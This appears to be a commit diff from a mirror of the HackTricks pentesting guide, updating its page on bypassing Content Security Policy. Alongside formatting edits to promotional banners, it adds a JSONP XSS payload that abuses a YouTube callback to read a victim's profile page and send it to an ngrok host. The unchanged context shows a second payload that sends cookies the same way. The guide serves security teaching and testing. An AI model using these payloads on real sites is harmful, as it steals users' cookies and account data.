0x22bb
/
hacktricks
mirror of https://github.com/carlospolop/hacktricks.git
1
2
Fork 0
Code Releases Activity

GITBOOK-3813: No subject

This commit is contained in:
CPol 2023-03-05 18:12:38 +00:00 committed by gitbook-bot
parent df3103dbf8
commit a67c417bb8
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
1 changed files with 12 additions and 18 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

30
pentesting-web/content-security-policy-csp-bypass/README.md
View File

@ -12,10 +12,9 @@
</details>
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
🐞 Read web3 bug tutorials
@ -23,9 +22,6 @@
💬 Participate in community discussions
## What is CSP
Content Security Policy or CSP is a built-in browser technology which **helps protect from attacks such as cross-site scripting (XSS)**. It lists and describes paths and sources, from which the browser can safely load resources. The resources may include images, frames, javascript and more. Here is an example of resources being allowed from the local domain (self) to be loaded and executed in-line and allow string code executing functions like `eval`, `setTimeout` or `setInterval:`
@ -250,7 +246,7 @@ The post shows that you could **load** all **libraries** from `cdn.cloudflare.co
### Third Party Endpoints + JSONP
```http
Content-Security-Policy: script-src 'self' https://www.google.com; object-src 'none';
Content-Security-Policy: script-src 'self' https://www.google.com https://www.youtube.com; object-src 'none';
```
Scenarios like this where `script-src` is set to `self` and a particular domain which is whitelisted can be bypassed using JSONP. JSONP endpoints allow insecure callback methods which allow an attacker to perform XSS, working payload:
@ -260,6 +256,11 @@ Scenarios like this where `script-src` is set to `self` and a particular domain
"><script src="/api/jsonp?callback=(function(){window.top.location.href=`http://f6a81b32f7f7.ngrok.io/cooookie`%2bdocument.cookie;})();//"></script>
```
```html
https://www.youtube.com/oembed?callback=alert;
<script src="https://www.youtube.com/oembed?url=http://www.youtube.com/watch?v=bDOYN-6gdRE&format=json&callback=fetch(`/profile`).then(function f1(r){return r.text()}).then(function f2(txt){location.href=`https://b520-49-245-33-142.ngrok.io?`+btoa(txt)})"></script>
```
[**JSONBee**](https://github.com/zigoo0/JSONBee) **contains ready to use JSONP endpoints to CSP bypass of different websites.**
The same vulnerability will occur if the **trusted endpoint contains an Open Redirect** because if the initial endpoint is trusted, redirects are trusted.
@ -462,10 +463,9 @@ img-src https://chall.secdriven.dev https://doc-1-3213.secdrivencontent.dev http
Trick from [**here**](https://ctftime.org/writeup/29310).
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
🐞 Read web3 bug tutorials
@ -473,9 +473,6 @@ Trick from [**here**](https://ctftime.org/writeup/29310).
💬 Participate in community discussions
## Unsafe Technologies to Bypass CSP
### PHP response buffer overload
@ -594,9 +591,9 @@ If you know how to exfiltrate info with WebRTC [**send a pull request please!**]
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
🐞 Read web3 bug tutorials
@ -604,9 +601,6 @@ If you know how to exfiltrate info with WebRTC [**send a pull request please!**]
💬 Participate in community discussions
<details>
<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>